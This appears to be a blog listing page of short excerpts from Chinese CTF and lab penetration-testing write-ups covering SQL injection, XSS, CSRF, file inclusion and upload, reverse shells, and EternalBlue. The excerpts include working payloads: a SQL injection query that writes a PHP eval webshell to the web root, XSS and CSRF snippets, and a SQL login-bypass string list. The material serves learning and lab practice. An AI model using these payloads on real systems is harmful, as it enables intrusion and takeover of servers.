- 博客(64)
- 收藏
- 关注
原创 20240911泰山杯初赛--temp
其中, 【Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9】是一个路径: O:9:“PageModel”:1:{s:4:“file”;在后续的第82646个ICMP包中,发现了echo回显的flag。将此代入上面的PHP脚本,运行后,发现shell_exec执行的命令为: cat /flag。Wireshark打开temp.pcap流量包,发现有很多ICMP协议包。
2024-09-15 02:35:55 1055
原创 x64dbg手脱壳
第一次比赛上体验手脱,记录一下,64位程序,x64dbg载入断点里找入口,跟进去,423DC0是入口F9让程序执行到这里再F8,发现只有RSP寄存器的发生变化,符合ESP脱壳定律在RSP这里右键,选择在内存窗口中转到在内存窗口右键选择4字节的硬件断点断点下好以后F9运行,跳到423FD5处,断在了几个pop之后往下边看看,发现有一个大跳,在423FE5处下断点,F9运行过去然后F7这里有一个点我比较疑惑,网...
2021-10-24 18:37:10 3933 1
原创 关于RSA共模攻击e1,e2不互素的解法
最近做密码学rsa的题目,搜集了很多情况下的rsa解题脚本,记录一下import gmpy2import rsafrom binascii import a2b_heximport libnumfrom Crypto.Util.number import long_to_bytes#--------------------------------------------------------------------------------------------------------
2021-09-29 18:09:25 3162
原创 羊城杯2021_Re_BabySmc
拿到题第一件事查壳、看信息无壳,64位IDA,进入主函数跟进byte_140001085发现一大推数据,应该是被加密了IDA动态调试,先F5,然后一路F8,随意输入flag,执行到140001085地址继续一直F8到出现此对话,Yes这时程序代码已经自解密了,然后一直按着F8直到程序暂停重新进行动调,F5,一路F8,随意输入flag后继续F8,F8进去,再F5回去接着边鼠标向下划边一直按...
2021-09-21 15:43:57 560 1
原创 php常用函数(持续更)
file_get_contents()file_get_contents() 函数把整个文件读入一个字符串中。和file()一样,不同的是 file_get_contents() 把文件读入一个字符串。file_get_contents() 函数是用于将文件的内容读入到一个字符串中的首选方法。如果操作系统支持,还会使用内存映射技术来增强性能。file_get_contents(path,include_path,context,start,max_length)extrac..
2021-08-25 20:15:41 160
原创 crunch_kali命令
简单使用注意:所有用法中最大和最小长度必须要输入,不过对结果不影响crunch最短位数最长位数[字符集设置][options]生成3到4位的小写字母为元素的所有组合:crunch 3 4生成3到4位由字符串abcde开头,以字符串gggggg为结束的所有字符组合:crunch34abcde生成一个3到4位的密码,且都由1234中的4个数字组成:crunch 3 4 1234生成一个个人信息的字典,包括姓名,年龄,生日,城市等:cr...
2021-08-25 16:21:07 275
原创 反弹shell_DC-3_wp
反弹shell原理与实现(转自反弹shell原理与实现 - iouwenbo - 博客园 (cnblogs.com))什么是反弹shell?反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。为什么要反弹shell?通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例:假设我
2021-08-20 17:26:55 715 1
原创 MySQL环境实操wp
拿到站点IP,无法访问,没有打开80端口扫一下端口,发现125端口是打开的瞅一眼,是个弹框登录,试试弱口令,不太行,抓包爆破试试发到intruder模块,这里提一下,发现这里有认证头,Basic后的一串字符应该是用户名:密码的base64加密,所以我们把Basic后边的圈起来进行爆破,我猜测有admin这个用户这里选择custom iterator类型在position1里添入admin,当然如果猜测还有可能是其他用户名也可以添加在positi...
2021-08-19 16:18:06 174
原创 SQL server提权_环境实操wp
拿到IP,先进去看看,发现啥都没有上nmap和御剑扫一下端口没扫到啥新鲜的端口,去8080端口看看是个登录框,试了试弱口令什么的都不行,上御剑扫一下目录发现一个www.zip,进去试试发现一个config文件拿到了数据库账号密码,登上去看看拿到一个key,再找找拿到管理员账号密码,从8080端口登进去看看没登上去,发现密码是拿md5加密了,解密一下为 woaini521成功登进去,拿到key找了找其他地方...
2021-08-17 20:19:09 306
原创 PTE_远程文件包含wp
一堆看不懂的东西,发现并没有本地文件包含的点试试远程文件包含,发现是可以的从远程服务器远程文件包含一个写了一句话木马的 1.txt发现 txt 被双写了,应该是服务器端自动添加了一个 .txt 后缀,所以我们去掉我们的后缀成功写入,执行命令,这里的 c 是我们一句话木马中自己写的哦显示 get it 查看源码,发现key值...
2021-08-13 17:28:25 591 1
原创 phar / zip 伪协议的应用wp
查看源码显示只能上传txt文件上传一个txt文件试试上传成功这里我们退回主页面,发现有一个LFI here,意思是:这里是文件包含,点进去发现页面和源码什么都没有退回主页面查看主页面源码,发现有提示 lfi.txt我们将刚刚的 lfi.php 改成 lfi.txt 试一试,发现有内容,意思是给file传了一次参数,给file传的参数不能为空,无论file名是什么,都在file名后加一个 .php 后缀,注释的意思是值允许php文件被包含...
2021-08-13 16:31:40 1842 1
原创 PTE_本地文件包含wp
进入题目,提示答案在根目录下的key.php文件中,所以我们最后只需要cat该文件应该就有key了开始答题,页面上没有什么有用信息查看该页面的源码,也没找到什么有用信息我们发现网页是使用文件包含的方法打开了view.html,我们可以访问view.html,然后查看源码发现用Hello传了一次参数,第四行进行了base64加密进行base64解密,发现是用POST方式以z0传参综上,我们一共需要传两次参数,第一次是Hello需要传参,这里随便给He
2021-08-13 15:01:41 724
原创 环境实操_本地文件包含
给了提示是我们要找的flag的路径是 include/flag打开网页开始疯狂点击寻找上边点几个,发现都是mod传参,试试文件包含不存在加../ 试试发现加的 ../ 并没有加上,应该是被过滤了,试试 ..\竟然给我转义成双写了 ,试试 ../ 双写,即 ..././发现写进去了,但没有出来,继续加成功拿到flag...
2021-08-13 11:33:40 161
原创 文件包含漏洞1_本地
文件包含常用函数 |-------本地文件包含 文件包含---| |-------远程文件包含本地文件包含../被过滤了,使用..\或者双写也可以这里采用了添加 .php 后缀的方法进行保护,我们可以使用00截断来绕过,即在 .txt后加上%00示例——04在第三关的基础上发现多了一个前缀action...
2021-08-13 11:00:18 194
原创 Web_文件上传2(DAY8)
常见文件上传点WebshellWebshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。拆分开来看,“web”的含义显然是服务器开放的web服务,“shell”的含义是取得对服务器某种程度上操作权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。webshell被站长常常用于网站管理、服务器管理等等,根据FSO权限的不同,作用有在线编辑网页脚本、上传下载文件、查看数据库、执行任意程...
2021-08-12 15:13:25 214
原创 PTE_文件上传wp
上传.php抓包发到repeater改包这是截图的时候打错了,应该是jpeg,还是失败,改大写失败,改一句话成功,去试一试全选覆盖掉intercept右键然后把包放完还是没成功,没有解析重新之前所有步骤,尝试把phP改成php5然后继续Do intercept加放包发现可以解析了,但命令不执行,于是再试试把一句话的jm的单引号去掉,Do intercept,放包输入命令,执行了,接下来cat key.php就行了...
2021-08-12 15:01:15 543
原创 XSS过滤实操
第一关——直接输出第二关——value第二关需要闭合value,看源码应该是用双引号闭合的,但是发现不行,于是用单引号闭合试了试竟然可以,可能是环境问题吧。。。第三关——xss过滤简单input没有闭合,而且alert没了被过滤了成功第四关——xss简单过滤报错了,说明我们输入的某些语句触发了报错,一点一点删除语句尝试看看哪里错了发现删除alert()函数不报错了,说明程序设置了使用alert报错,我们换...
2021-08-10 17:47:21 1088
原创 存储型XSS_简单漏洞复现
首先随便注册一个账号登录写一篇邮件,邮件内容插入xss语句burpsuit抓包,发送到repeater,放包,发现script被过滤了所以改包改用<img src=1 onpointerout=alert(123)>这里我们去看看我们发布的内容是否双击以后有弹窗弹窗出现,说明有xss漏洞...
2021-08-10 14:12:41 443
原创 PTE_XSS(Day2)
JS消息框分为以下三种:alert("文本")confirm("文本")<script>var r=confirm("你选择了什么");if(r==true){alert('你选择了确认');}else{alert('你选择了取消');}</script>prompt("文本","默认值")XSS存储型注入这里发现单引号被过滤了,所以用 / 或者双引号代替单引号重定向...
2021-08-10 11:46:59 280
原创 PHPOK4.2.100_CSRF复现
使用管理员账户进后台创建一个能够添加管理员账户的表单<div style="display:none"><form action="http://xxx:xxx/admin.php?c=admin&f=save" id="poc" name="poc" method="post"><input type="hidden" name="id" value=""/><input type="hidden" name="account"
2021-08-10 09:26:21 244
原创 PTE_SSRF漏洞复现(Day1)
Web安全基础-请求伪造漏洞SSRF:服务器端请求伪造,由攻击者构造请求,由服务端发起请求的一个安全漏洞,能够请求到与它相连而与外网隔离的内部系统。攻击方式如下所示:1.信息收集:可以对外网、服务器所在的内网、本地进行端口扫描,某些情况下端口的Banner会回显出来(比如3306的);2.执行指令:攻击运行在内网或本地的应用程序(比如溢出);3.信息收集:对内网Web应用进行指纹识别(比如识别企业内部的资产信息);4.执行指令:攻击内外网有漏洞的Web应用,主要使用httpget请求
2021-08-09 17:32:09 351
原创 ctf制作一个web题
首先将源码拷贝到服务器下然后将源码移动到容器中的var/www/html下,然后进入容器docker cp zzz.php f68:/var/www/html然后就可以访问 ip:端口/zzz.php 查看题目了
2021-08-09 09:11:43 667
原创 Web_sql万能密码(DAY6)
先附上我收集的一些万能密码'or 1=1/*"or "a"="a"or 1=1--"or"=""or"="a'='a"or1=1--"or=or"''or'='or'') or ('a'='a'.).or.('.a.'='.a'or 1=1'or 1=1--'or 1=1/*'or"="a'='a'or' '1'='1''or''=''or''=''or''=''or'='1''or'='or''or.'a.'='a'or1=1--1'or'1'='1...
2021-08-04 17:43:00 250
原创 Web_sql之宽字节注入(DAY7)
ASCII占用一个字符GBK 占用两个字符URL转码 %df宽字节注释过程' --> /'%df' --> %df/' --> %df%5c%23GBK编码%df%5c%27 -->運%27 -->運'%df%5c -->運
2021-08-03 14:20:41 96
原创 Web_二次注入(DAY6)
二次注入的使用场景是,大多数网站都会对用户输入的语句进行对特殊符号的过滤。例如:恶意用户构造的插入语句为1',经过这些函数的处理则变为1\',这样便可以防止用户向服务器插入数据时引发的一些恶意操作,但这只是中途过滤了一下,最终返回到数据库里面的数据还是1'如果管理者对取出的数据没有进行进一步的检验处理,服务器从数据库取出恶意数据,未经过滤就直接拼接SQL语句进行查询,就会发生了SQL二次注入二次注入流程1、注册test' or '1'='12、更新密码更新用户:test' or '1
2021-08-02 17:30:24 160
原创 Web_文件上传1_一句话木马(DAY6)
找注入点,判断类型,确认回显点后写入一句木马连接蚁剑?id=32 and 1=2 union select 1,2,database(),4,5,6,7,8,9,10,"<?php eval($_POST['jm']);?>",12,13,14,15 into outfile "/var/www/html/jm.php"查询一下jm.php是否已经上传右键添加数据把我们上传的地址写上去,连接密码是我们一句话木马上自己设置的,为js点添加,然..
2021-08-02 17:15:17 366
原创 Web_SQL盲注_时间盲注(DAY5)
当数字型和字符型都没有回显和报错,就要用到时间盲注了先理解以下语句select if(1=2,'b',sleep(3));判断 if() 函数第一个参数是否正确,正确则执行第二个参数,错误则执行第三个参数这里停了五秒,说明报错了,所以我们根据这个原理改变第一个参数去猜我们需要的数据例如猜数据库名的长度,判断是否数据库名长度大于1,没有延迟则猜测正确判断数据库名的长度是否,延迟了我们设置的5秒,说明猜测错误,然后结合布尔盲注的思路猜猜猜猜猜猜猜...
2021-07-30 17:26:18 142
原创 Web_SQL盲注_布尔盲注(下方有实操)(DAY5)
盲注常用函数:left(a,b)从左侧截取 a 的前 b 位substr(a,b,c)从 b 位置开始,截取字符串 a 的 c 长度。mid(a,b,c)从位置 b 开始,截取 a 字符串的 c 位ascii(str)返回给定字符的ascii值,如 ascii("a")=97ord()函数同 ascii(),将字符转为 ascii 值length(str)返回给定字符串的长度,如 length("string")=6substr(a,b,c)图中在当前mysql数据库的库...
2021-07-30 17:00:07 276
原创 sqli dumb series-25 (绕过AND OR 过滤)
进入网页发现正中间写了or和and被过滤了首先判断不是数字型,为字符型注入这里记录一下 and 和 or 的过滤方式:and --> ananddor --> oorr
2021-07-30 09:04:32 215
原创 Web_零基础入门sql注入_联合注入(DAY4)
拉取WordPressdocker pull wordpress:latestdocker pull wordpress:latest
2021-07-29 16:46:15 167
原创 Web_docker搭建wordpress(DAY3)
拉取WordPressdocker pull wordpress:latest拉取MySQLdocker pull mysql:latest启动MySQLdocker run --name 123456 -e MYSQL_ROOT_PASSWORD=123456 -d mysql:latest启动WordPressdocker run --name w123456 --link w123456:mysql -p 8080:80 -d wordpress.
2021-07-29 10:20:59 173
原创 Web_docker加速(DAY3)
登录阿里云,点击右上角控制台找到容器镜像服务,点击进入找到镜像加速器得到自己专属的镜像加速器地址可以通过修改darmon配置文件/etc/docker/如果没有该文件,就自己创建一个touch daemon.json编辑daemon.json文件将得到的镜像加速器地址写入vim daemon.json载入配置sudo systemctl daemon-reload重启docker环境sudo systemctl r...
2021-07-28 15:39:14 93
原创 Web_docker_从vulhub拉取镜像并使用(DAY3)
首先下载好vulhub下载成功后,cd到vulhub目录cd vulhubls 命令查看漏洞靶场随便进入一个目录,任意选择镜像这里以我随便选择的镜像为例修改docker-conpose文件,把端口改成未使用的端口,例如8089:80vim docker-compose.yml 启动环境docker compose -d查看启动环境,发现端口为之前我们改成的8089:80docker-compose ps查看kali的ip,主机浏览器访问...
2021-07-28 15:22:00 562
原创 Web_kali2020下配置Docker并拉取vulhub(DAY3)
安装GPG证书,换源curl -fsSL https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/gpg | sudo apt-key add -echo 'deb https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/ buster stable' | sudo tee /etc/apt/sources.list.d/docker.list更新APTsu
2021-07-28 10:43:06 296
原创 Web_ctf_git泄露
打开网址发现以下信息御剑扫描扫到index.php猜测为git泄露打开kali使用Git Hack工具python2 GitHack.py http://xxxxxxxxxxxxxx.com/index.php/.git/得到隐藏文件index.phpcat打开得到flag
2021-07-27 17:24:56 216
原创 Web_信息搜集(DAY2)
KALI whatweb功能域名查询爱站:dns.aizhan.com站长之家 :tool.chinaz.comwhois命令子域名查询http://tool.chinaz.com/subdomain备案号查询tianyancha.com主机信息搜索主机开放的端口和服务主机的操作系统识别常见端口TCP端口(静态端口)TCP 0= ReservedTCP 1=TCP Port Service MultiplexerTCP 2..
2021-07-27 15:42:22 3837
原创 Web_永恒之蓝复现(DAY1)
永恒之蓝漏洞复现环境:kali2020(攻击机)、windows7(靶机)前期准备:1、windows7需要关掉防火墙2、两台主机网络连接都设置为NAT模式3、检查攻击机ip与靶机ip是否可以联网,是否可以相互ping通,是否处于同一网段漏洞复现:使用nmap去扫描目标机的端口开启情况:nmap -sS -sV 192.168.111.139发现靶机445端口为开放状态,存在永恒之蓝漏洞,且版本为win7-10打开msfmsfconso...
2021-07-27 15:41:48 204
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人